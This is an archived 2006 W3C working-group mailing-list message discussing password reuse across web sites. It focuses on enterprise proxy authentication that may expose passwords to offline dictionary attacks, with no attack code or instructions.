- From: Stephen Farrell <stephen.farrell@cs.tcd.ie>
- Date: Tue, 12 Dec 2006 17:01:21 +0000
- To: "Close, Tyler J." <tyler.close@hp.com>
- Cc: W3 Work Group <public-wsc-wg@w3.org>
Close, Tyler J. wrote: > > Mary Ellen Zurko wrote: >> All look good, though I think this one falls out of our scope: >> * Passwords are reused across distinct web sites > > I was thinking we could address this problem through the user interface > to the browser's password manager. For example, if the user interface > made it easier to generate, remember and form fill passwords, perhaps > users would do that, instead of reusing the same password at distinct > web sites. I guess everyone knows already but in some networks its very hard to get them to do much about dodgy password re-use. Case in point - where an outbound http proxy requires proxy authentication and checks against a RADIUS server or active directory. In many such cases that password use is vulnerable to an offline dictionary attack (am I right there that there's no ssl-to-the-proxy option? if there were that'd be a nice way to confuse a user anyway;-). And in some of those cases the same password must also be used for other services (e.g. to access intranet pages, authenticate to imap etc). I guess the best there would be to recommend that the admins turn off the (probably silly) outbound proxy authentication requirement. There are also cases where enterprises offer "intranet" access from home, which effectively require entry of that same password over the public Internet and in clear. I know of one enterprise that does all of the above in the name of "security" and who weren't at all receptive to being told that they were making some things worse. S.
Received on Tuesday, 12 December 2006 17:00:35 UTC